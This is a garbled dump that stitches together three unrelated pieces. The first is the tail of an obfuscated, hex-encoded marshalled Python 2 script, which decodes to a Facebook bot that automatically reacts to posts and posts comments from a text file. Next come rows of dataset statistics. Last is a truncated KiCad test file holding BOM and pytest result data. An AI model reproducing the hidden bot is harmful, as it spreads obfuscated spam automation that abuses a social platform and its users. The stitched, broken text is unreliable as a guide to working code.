x002062722e5ft\n\x00\x00\x00666163746ft\n\x00\x00\x0072792e6973t\n\x00\x00\x005f68746d6ct\n\x00\x00\x00203d205472t\n\x00\x00\x0075650a2020t\n\x00\x00\x002069692069t\n\x00\x00\x006c696e6b73t\n\x00\x00\x0028293a0a20t\n\x00\x00\x002020202069t\n\x00\x00\x006620277265t\n\x00\x00\x006e5f747970t\n\x00\x00\x00653d257327t\n\x00\x00\x002561637420t\n\x00\x00\x00696e206969t\n\x00\x00\x002e75726c3at\n\x00\x00\x0075726c312bt\n\x00\x00\x0069692e7572t\n\x00\x00\x006c290a2020t\n\x00\x00\x002020202062t\n\x00\x00\x00636f742b3dt\n\x00\x00\x003120237072t\n\x00\x00\x002054616e67t\n\x00\x00\x006761706920t\n\x00\x00\x00446f6e6527t\n\x00\x00\x00696d652e73t\n\x00\x00\x006c65657028t\n\x00\x00\x003230290a20t\n\x00\x00\x000a20202062t\n\x00\x00\x000a20206578t\n\x00\x00\x006365707420t\n\x00\x00\x004b6579626ft\n\x00\x00\x00617264496et\n\x00\x00\x007465727275t\n\x00\x00\x0070743a6272t\n\x00\x00\x0065616b0a0at\n\x00\x00\x00646566206bt\n\x00\x00\x006f6d656e74t\n\x00\x00\x00617228293at\n\x00\x00\x000a20747279t\n\x00\x00\x003a6d73673dt\n\x00\x00\x007379732e70t\n\x00\x00\x006174685b30t\n\x00\x00\x005d2b272f6bt\n\x00\x00\x006f6d656e2et\n\x00\x00\x007478742729t\n\x00\x00\x002e72656164t\n\x00\x00\x0028290a2065t\n\x00\x00\x005d2074756ct\n\x00\x00\x00697320225bt\n\x00\x00\x00656e746572t\n\x00\x00\x005d22207461t\n\x00\x00\x006e70612074t\n\x00\x00\x00616e646120t\n\x00\x00\x00706574696bt\n\x00\x00\x006b20626172t\n\x00\x00\x006973206261t\n\x00\x00\x007275270a20t\n\x00\x00\x00206d736730t\n\x00\x00\x006e206b6f6dt\n\x00\x00\x00656e746172t\n\x00\x00\x000a20206f70t\n\x00\x00\x00656e287379t\n\x00\x00\x00272f6b6f6dt\n\x00\x00\x00656e2e7478t\n\x00\x00\x0074272c2777t\n\x00\x00\x0027292e7772t\n\x00\x00\x00697465286dt\n\x00\x00\x007367302e72t\n\x00\x00\x006528275b65t\n\x00\x00\x006e7465725dt\n\x00\x00\x00272c275c6et\n\x00\x00\x002729290a20t\n\x00\x00\x00206d73673dt\n\x00\x00\x0028290a2063t\n\x00\x00\x006f743d310at\n\x00\x00\x00207768696ct\n\x00\x00\x006520547275t\n\x00\x00\x00653a0a2020t\n\x00\x00\x007472793a0at\n\x00\x00\x002020206b6dt\n\x00\x00\x00743d5b5d0at\n\x00\x00\x00613d27270at\n\x00\x00\x00202020666ft\n\x00\x00\x002020206966t\n\x00\x00\x002027206b6ft\n\x00\x00\x00722720696et\n\x00\x00\x0020692e7465t\n\x00\x00\x0078742e6c6ft\n\x00\x00\x007765722829t\n\x00\x00\x006b6f6d656et\n\x00\x00\x007461726927t\n\x00\x00\x007228293a6bt\n\x00\x00\x006d742e6170t\n\x00\x00\x002069662027t\n\x00\x00\x006b656c7561t\n\x00\x00\x007220272069t\n\x00\x00\x006e20692e74t\n\x00\x00\x006578742e6ct\n\x00\x00\x006f77657228t\n\x00\x00\x0027290a0a20t\n\x00\x00\x00206b6d743at\n\x00\x00\x00206d656e67t\n\x00\x00\x00617269206bt\n\x00\x00\x006520257327t\n\x00\x00\x0025636f7429t\n\x00\x00\x002e666c7573t\n\x00\x00\x006828290a20t\n\x00\x00\x002e6f70656et\n\x00\x00\x002875726c31t\n\x00\x00\x002b69290a20t\n\x00\x00\x0062722e6669t\n\x00\x00\x006e645f6c69t\n\x00\x00\x006e6b287379t\n\x00\x00\x0061292e7572t\n\x00\x00\x006c0a202020t\n\x00\x00\x002020237072t\n\x00\x00\x00206b616d75t\n\x00\x00\x002073756461t\n\x00\x00\x006820626572t\n\x00\x00\x007461722064t\n\x00\x00\x006973696e69t\n\x00\x00\x002065786365t\n\x00\x00\x0070743a0a20t\n\x00\x00\x002020202074t\n\x00\x00\x0072793a6272t\n\x00\x00\x002e73656c65t\n\x00\x00\x0063745f666ft\n\x00\x00\x00726d286e72t\n\x00\x00\x003d31290a20t\n\x00\x00\x002020202065t\n\x00\x00\x003a62722e73t\n\x00\x00\x00666f726d5bt\n\x00\x00\x0027636f6d6dt\n\x00\x00\x00656e745f74t\n\x00\x00\x00657874275dt\n\x00\x00\x003d6d73670at\n\x00\x00\x002020202063t\n\x00\x00\x006f742b3d31t\n\x00\x00\x002023707269t\n\x00\x00\x006e74202720t\n\x00\x00\x00205b2a5d20t\n\x00\x00\x007461722073t\n\x00\x00\x00756b736573t\n\x00\x00\x0074696d652et\n\x00\x00\x00736c656570t\n\x00\x00\x00283230290at\n\x00\x00\x00650a202065t\n\x00\x00\x00204b657962t\n\x00\x00\x006f61726449t\n\x00\x00\x006e74657272t\n\x00\x00\x007570743a62t\n\x00\x00\x007265616b0at\n\x00\x00\x004e72656163t\n\x00\x00\x007428616374t\n\x00\x00\x00293a0a2074t\n\x00\x00\x0072793a6d73t\n\x00\x00\x00673d6f7065t\n\x00\x00\x006e28737973t\n\x00\x00\x002f6b6f6d65t\n\x00\x00\x006e2e747874t\n\x00\x00\x00616428290at\n\x00\x00\x005b2a5d2074t\n\x00\x00\x00756c697320t\n\x00\x00\x00225b656e74t\n\x00\x00\x0065725d2220t\n\x00\x00\x0074616e7061t\n\x00\x00\x002074616e64t\n\x00\x00\x006120706574t\n\x00\x00\x00696b20756et\n\x00\x00\x0074756b2062t\n\x00\x00\x006172697320t\n\x00\x00\x006261727527t\n\x00\x00\x000a20206d73t\n\x00\x00\x0067303d7261t\n\x00\x00\x00775f696e70t\n\x00\x00\x007574282720t\n\x00\x00\x006d6173756bt\n\x00\x00\x006b616e206bt\n\x00\x00\x006172203d20t\n\x00\x00\x0027290a2020t\n\x00\x00\x00747874272ct\n\x00\x00\x00277727292et\n\x00\x00\x007772697465t\n\x00\x00\x00286d736730t\n\x00\x00\x005b656e7465t\n\x00\x00\x00725d272c27t\n\x00\x00\x005c6e272929t\n\x00\x00\x0020636f743dt\n\x00\x00\x00310a20636ft\n\x00\x00\x006d3d310a20t\n\x00\x00\x0020206b6d74t\n\x00\x00\x002020737961t\n\x00\x00\x003d27270a20t\n\x00\x00\x0027206b6f6dt\n\x00\x00\x00742e6c6f77t\n\x00\x00\x006572282920t\n\x00\x00\x006f7220276bt\n\x00\x00\x006172692720t\n\x00\x00\x00696e20692et\n\x00\x00\x00746578742et\n\x00\x00\x006c6f776572t\n\x00\x00\x0028293a6b6dt\n\x00\x00\x00742e617070t\n\x00\x00\x00656e642869t\n\x00\x00\x002e75726c29t\n\x00\x00\x00696620276bt\n\x00\x00\x00202720696et\n\x00\x00\x00290a0a2020t\n\x00\x00\x006b6d743a0at\n\x00\x00\x00722e6f7065t\n\x00\x00\x006e2875726ct\n\x00\x00\x00312b69290at\n\x00\x00\x00666f722074t\n\x00\x00\x006720696e20t\n\x00\x00\x0062722e6c69t\n\x00\x00\x006e6b732829t\n\x00\x00\x002020737973t\n\x00\x00\x002e7374646ft\n\x00\x00\x0075742e7772t\n\x00\x00\x006974652827t\n\x00\x00\x005c7220205bt\n\x00\x00\x002a7d206d65t\n\x00\x00\x006e616e6767t\n\x00\x00\x00617069206bt\n\x00\x00\x006520257320t\n\x00\x00\x00746172206bt\n\x00\x00\x002528636f74t\n\x00\x00\x002c636f6d29t\n\x00\x00\x0075742e666ct\n\x00\x00\x007573682829t\n\x00\x00\x006170692720t\n\x00\x00\x00696e207467t\n\x00\x00\x007228293a0at\n\x00\x00\x00726c312b74t\n\x00\x00\x00672e75726ct\n\x00\x00\x00696920696et\n\x00\x00\x006966202772t\n\x00\x00\x006561637469t\n\x00\x00\x006f6e5f7479t\n\x00\x00\x0070653d2573t\n\x00\x00\x002725616374t\n\x00\x00\x006c312b6969t\n\x00\x00\x002020636f74t\n\x00\x00\x002b3d312023t\n\x00\x00\x002a5d205461t\n\x00\x00\x006920446f6et\n\x00\x00\x0065270a0a20t\n\x00\x00\x002020207472t\n\x00\x00\x002e66696e64t\n\x00\x00\x005f6c696e6bt\n\x00\x00\x002873796129t\n\x00\x00\x002e75726c0at\n\x00\x00\x00237072696et\n\x00\x00\x00616d752073t\n\x00\x00\x007564616820t\n\x00\x00\x006265726b6ft\n\x00\x00\x007220646973t\n\x00\x00\x002020747279t\n\x00\x00\x00286e723d31t\n\x00\x00\x002020657863t\n\x00\x00\x006570743a62t\n\x00\x00\x00722e73656ct\n\x00\x00\x006563745f66t\n\x00\x00\x006f726d286et\n\x00\x00\x00723d30290at\n\x00\x00\x0062722e666ft\n\x00\x00\x00726d5b2763t\n\x00\x00\x00745f746578t\n\x00\x00\x0074275d3d6dt\n\x00\x00\x0073670a2020t\n\x00\x00\x002020636f6dt\n\x00\x00\x002a5d206b6ft\n\x00\x00\x00722073756bt\n\x00\x00\x00736573270at\n\x00\x00\x002020207469t\n\x00\x00\x006d652e736ct\n\x00\x00\x006565702832t\n\x00\x00\x00726c31290at\n\x00\x00\x00657074204bt\n\x00\x00\x006579626f61t\n\x00\x00\x007264496e74t\n\x00\x00\x006572727570t\n\x00\x00\x00743a627265t\n\x00\x00\x00616b0a0a6dt\n\x00\x00\x006f64653d69t\n\x00\x00\x002720205b31t\n\x00\x00\x005d20467265t\n\x00\x00\x00652066625ct\n\x00\x00\x006e20205b32t\n\x00\x00\x005d206d6f62t\n\x00\x00\x00696c652066t\n\x00\x00\x00625c6e2020t\n\x00\x00\x005b3e5d2027t\n\x00\x00\x00290a6d6f64t\n\x00\x00\x0065733d7b31t\n\x00\x00\x003a27667265t\n\x00\x00\x0065272c323at\n\x00\x00\x00276d6f6269t\n\x00\x00\x006c65277d0at\n\x00\x00\x0075726c313dt\n\x00\x00\x002768747470t\n\x00\x00\x00733a2f2f27t\n\x00\x00\x002b6d6f6465t\n\x00\x00\x00735b6d6f64t\n\x00\x00\x00655d2b272et\n\x00\x00\x006661636562t\n\x00\x00\x006f6f6b2e63t\n\x00\x00\x006f6d270a72t\n\x00\x00\x000a69662027t\n\x00\x00\x007379732e61t\n\x00\x00\x007267763a0at\n\x00\x00\x006e7428290at\n\x00\x00\x00656c73653at\n\x00\x00\x000a206d756ct\n\x00\x00\x00616928290at\n\x00\x00\x000a7072696et\n\x00\x00\x007420275c6et\n\x00\x00\x005c6e646f6et\n\x00\x00\x00655c6e6279t\n\x00\x00\x00203a204261t\n\x00\x00\x006e672d446at\n\x00\x00\x006f6e270a0at\x01\x00\x00\x00"t\x01\x00\x00\x00.t\x03\x00\x00\x00dect\x03\x00\x00\x00odes\x02\x00\x00\x00("t\x01\x00\x00\x00ht\x00\x00\x00\x00t\x01\x00\x00\x00es\x02\x00\x00\x00x"t\x01\x00\x00\x00)t\x01\x00\x00\x00(s\x02\x00\x00\x00"us\x02\x00\x00\x008"N(\x01\x00\x00\x00t\x07\x00\x00\x00__doc__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s:\x00\x00\x00\x06\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\x03\x00'''))
| 16,477
| 49,415
| 0.807894
| 9,221
| 49,431
| 4.329791
| 0.146622
| 0.177783
| 0.197946
| 0.02139
| 0.240501
| 0.214126
| 0.204383
| 0.187802
| 0.164759
| 0.157946
| 0
| 0.501265
| 0.000202
| 49,431
| 3
| 49,415
| 16,477
| 0.30659
| 0
| 0
| 0
| 0
| 0.5
| 0.99913
| 0.998988
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
3443b9a49f145f3ebe72de040f65025ec1588589
| 173
|
py
|
Python
|
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | 3
|
2019-12-20T12:39:17.000Z
|
2021-04-22T14:29:39.000Z
|
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | null | null | null |
src/python/zensols/ngramdb/__init__.py
|
plandes/ngramdb
|
b0998e94ae411f84ab401794057423f53f60cc30
|
[
"MIT"
] | null | null | null |
from zensols.ngramdb.config import *
from zensols.ngramdb.db import *
from zensols.ngramdb.down import *
from zensols.ngramdb.app import *
from zensols.ngramdb.cli import *
| 28.833333
| 36
| 0.797688
| 25
| 173
| 5.52
| 0.36
| 0.398551
| 0.652174
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115607
| 173
| 5
| 37
| 34.6
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
34787a4d8e19bcbb66e042ca5f47f6abf446c527
| 23,576
|
py
|
Python
|
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
test/test_kibot_parser.py
|
spielhuus/sconstool-kicad
|
01d9fe8781cd692fa8a2d3e47498bbfa6bfd3425
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import unittest
from sys import path as syspath
from os import path as ospath
from pathlib import Path
import json
import xml.etree.ElementTree as ET
import SCons
syspath.append("..")
comnbined_result = {"kontur": {'summary': {'drc': 0, 'unconnected': 0, 'erc': 0}, "main": {"bom": [{"ref": ["C1", "C2"], "value": "22u", "datasheet": "~", "description": "Aluminium Electrolytic Capacitors (50V, D=6.3 mm, LS=2.5 mm)", "footprint": "Capacitor_THT:CP_Radial_D6.3mm_P2.50mm"}, {"ref": ["C3", "C4", "C5", "C6", "C8", "C10", "C11"], "value": "0.1u", "datasheet": "~", "description": "Multilayer Ceramic Capacitors MLCC (50V, L=4 mm, W=2.5 mm, LS=2.5 mm)", "footprint": "Capacitor_THT:C_Rect_L4.0mm_W2.5mm_P2.50mm"}, {"ref": ["C7", "C9"], "value": "2.2u", "datasheet": "~", "description": "Multilayer Ceramic Capacitors MLCC (25V, L=6 mm, W=5.5 mm, LS=5 mm)", "footprint": "Capacitor_THT:C_Disc_D6.0mm_W4.4mm_P5.00mm"}, {"ref": ["D1", "D4", "D7", "D8", "D9", "D10", "D11", "D12", "D15", "D18", "D19", "D20", "D21", "D22"], "value": "1N4148", "datasheet": "https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf", "description": "Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal", "footprint": "Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal"}, {"ref": ["D2", "D3", "D5", "D6", "D13", "D14", "D16", "D17"], "value": "1N4148", "datasheet": "https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf", "description": "Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp", "footprint": "Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp"}, {"ref": ["J1"], "value": "01x09 Female", "datasheet": "~", "description": "Board to Board Connectors (2.54 mm)", "footprint": "Connector_PinSocket_2.54mm:PinSocket_1x09_P2.54mm_Vertical"}, {"ref": ["J2"], "value": "10 Pos", "datasheet": "~", "description": "Pin Header IDC (2.54mm)", "footprint": "Connector_IDC:IDC-Header_2x05_P2.54mm_Vertical"}, {"ref": ["J3"], "value": "01x07 Female", "datasheet": "~", "description": "Board to Board Connectors (2.54 mm)", "footprint": "Connector_PinSocket_2.54mm:PinSocket_1x07_P2.54mm_Vertical"}, {"ref": ["R1", "R16", "R19", "R32"], "value": "100k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R2", "R20"], "value": "27k", "datasheet": "~", "description": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R3", "R21"], "value": "390k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R4", "R9", "R22", "R25"], "value": "47k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R5", "R6"], "value": "10", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R7", "R23"], "value": "470k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R8", "R24"], "value": "2.2k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R10", "R26"], "value": "10k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R11", "R27"], "value": "36k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R12", "R14", "R15", "R17", "R18", "R28"], "value": "1k", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["R13", "R29"], "value": "220", "datasheet": "~", "description": "Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)", "footprint": "Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal"}, {"ref": ["U1", "U2", "U4"], "value": "LM324", "datasheet": "http://www.ti.com/lit/ds/symlink/lm2902-n.pdf", "description": "Package_DIP:DIP-14_W7.62mm_Socket", "footprint": "Package_DIP:DIP-14_W7.62mm_Socket"}, {"ref": ["U3"], "value": "4001", "datasheet": "http://www.intersil.com/content/dam/Intersil/documents/cd40/cd4000bms-01bms-02bms-25bms.pdf", "description": "Package_DIP:DIP-14_W7.62mm_Socket", "footprint": "Package_DIP:DIP-14_W7.62mm_Socket"}], "drc": [], "unconnected": [], "erc": []}}}
comnbined_result_test = {'kontur': {'summary': {'drc': 0, 'unconnected': 0, 'erc': 0, 'unit_test': {'passed': 7, 'num_tests': 8}}, 'main': {'bom': [{'ref': ['C1', 'C2'], 'value': '22u', 'datasheet': '~', 'description': 'Aluminium Electrolytic Capacitors (50V, D=6.3 mm, LS=2.5 mm)', 'footprint': 'Capacitor_THT:CP_Radial_D6.3mm_P2.50mm'}, {'ref': ['C3', 'C4', 'C5', 'C6', 'C8', 'C10', 'C11'], 'value': '0.1u', 'datasheet': '~', 'description': 'Multilayer Ceramic Capacitors MLCC (50V, L=4 mm, W=2.5 mm, LS=2.5 mm)', 'footprint': 'Capacitor_THT:C_Rect_L4.0mm_W2.5mm_P2.50mm'}, {'ref': ['C7', 'C9'], 'value': '2.2u', 'datasheet': '~', 'description': 'Multilayer Ceramic Capacitors MLCC (25V, L=6 mm, W=5.5 mm, LS=5 mm)', 'footprint': 'Capacitor_THT:C_Disc_D6.0mm_W4.4mm_P5.00mm'}, {'ref': ['D1', 'D4', 'D7', 'D8', 'D9', 'D10', 'D11', 'D12', 'D15', 'D18', 'D19', 'D20', 'D21', 'D22'], 'value': '1N4148', 'datasheet': 'https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf', 'description': 'Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal', 'footprint': 'Diode_THT:D_DO-35_SOD27_P7.62mm_Horizontal'}, {'ref': ['D2', 'D3', 'D5', 'D6', 'D13', 'D14', 'D16', 'D17'], 'value': '1N4148', 'datasheet': 'https://assets.nexperia.com/documents/data-sheet/1N4148_1N4448.pdf', 'description': 'Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp', 'footprint': 'Diode_THT:D_DO-35_SOD27_P2.54mm_Vertical_KathodeUp'}, {'ref': ['J1'], 'value': '01x09 Female', 'datasheet': '~', 'description': 'Board to Board Connectors (2.54 mm)', 'footprint': 'Connector_PinSocket_2.54mm:PinSocket_1x09_P2.54mm_Vertical'}, {'ref': ['J2'], 'value': '10 Pos', 'datasheet': '~', 'description': 'Pin Header IDC (2.54mm)', 'footprint': 'Connector_IDC:IDC-Header_2x05_P2.54mm_Vertical'}, {'ref': ['J3'], 'value': '01x07 Female', 'datasheet': '~', 'description': 'Board to Board Connectors (2.54 mm)', 'footprint': 'Connector_PinSocket_2.54mm:PinSocket_1x07_P2.54mm_Vertical'}, {'ref': ['R1', 'R16', 'R19', 'R32'], 'value': '100k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R2', 'R20'], 'value': '27k', 'datasheet': '~', 'description': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R3', 'R21'], 'value': '390k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R4', 'R9', 'R22', 'R25'], 'value': '47k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R5', 'R6'], 'value': '10', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R7', 'R23'], 'value': '470k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R8', 'R24'], 'value': '2.2k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R10', 'R26'], 'value': '10k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R11', 'R27'], 'value': '36k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R12', 'R14', 'R15', 'R17', 'R18', 'R28'], 'value': '1k', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['R13', 'R29'], 'value': '220', 'datasheet': '~', 'description': 'Metal Film Resistors - Through Hole (L=3.6 mm, D=1.6 mm, 1%)', 'footprint': 'Resistor_THT:R_Axial_DIN0204_L3.6mm_D1.6mm_P5.08mm_Horizontal'}, {'ref': ['U1', 'U2', 'U4'], 'value': 'LM324', 'datasheet': 'http://www.ti.com/lit/ds/symlink/lm2902-n.pdf', 'description': 'Package_DIP:DIP-14_W7.62mm_Socket', 'footprint': 'Package_DIP:DIP-14_W7.62mm_Socket'}, {'ref': ['U3'], 'value': '4001', 'datasheet': 'http://www.intersil.com/content/dam/Intersil/documents/cd40/cd4000bms-01bms-02bms-25bms.pdf', 'description': 'Package_DIP:DIP-14_W7.62mm_Socket', 'footprint': 'Package_DIP:DIP-14_W7.62mm_Socket'}], 'drc': [], 'unconnected': [], 'erc': []}, 'unit_test': {'report': {'environment': {'Python': '3.9.2', 'Platform': 'Linux-5.14.7-2-MANJARO-x86_64-with-glibc2.31'}, 'tests': [{'name': 'test/test_produkt.py::test_buffer_1a_voltage', 'duration': 0.22563197650015354, 'run_index': 0, 'setup': {'name': 'setup', 'duration': 0.0064605968073010445, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.21237082267180085, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0003399602137506008, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_1b_voltage', 'duration': 0.06783118983730674, 'run_index': 1, 'setup': {'name': 'setup', 'duration': 0.0005186581984162331, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06649156985804439, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.00030230358242988586, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_2a_voltage', 'duration': 0.06628352915868163, 'run_index': 2, 'setup': {'name': 'setup', 'duration': 0.00036448799073696136, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06524515384808183, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0003093993291258812, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_buffer_2b_voltage', 'duration': 0.06417899625375867, 'run_index': 3, 'setup': {'name': 'setup', 'duration': 0.0003621121868491173, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06313963187858462, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.000315140001475811, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_output_amplifier_1_voltage', 'duration': 0.06402606330811977, 'run_index': 4, 'setup': {'name': 'setup', 'duration': 0.00033985963091254234, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06304994691163301, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.0002963971346616745, 'outcome': 'passed'}, 'outcome': 'passed'}, {'name': 'test/test_produkt.py::test_output_amplifier_2_voltage', 'duration': 0.06275479821488261, 'run_index': 5, 'setup': {'name': 'setup', 'duration': 0.0004264460876584053, 'outcome': 'passed'}, 'call': {'name': 'call', 'duration': 0.06150294793769717, 'outcome': 'passed'}, 'teardown': {'name': 'teardown', 'duration': 0.00039895810186862946, 'outcome': 'passed'}, 'outcome': 